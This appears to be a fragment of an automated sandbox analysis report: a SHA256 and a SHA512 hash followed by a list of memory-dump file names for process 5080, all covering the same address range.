SHA256 2abe16321abecde2dea37b54fa870f0fbe52fb9898e0b14c63bd6ca2c2787db0
SHA512 1ba30af257edf4c796cc94986958f86b05503ac2cc6bd874a569356874276f4c9c63abdb191109d99bcc06089c31ff7f3456788f8a4639020b3b85c41f9f008c

memory/5080-365-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-368-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-371-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-374-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-377-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-382-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-385-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-388-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-391-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-394-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-397-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-400-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-403-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-406-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-410-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-413-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-415-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-418-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-421-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-424-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-427-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-433-0x00000000012B0000-0x0000000002504000-memory.dmp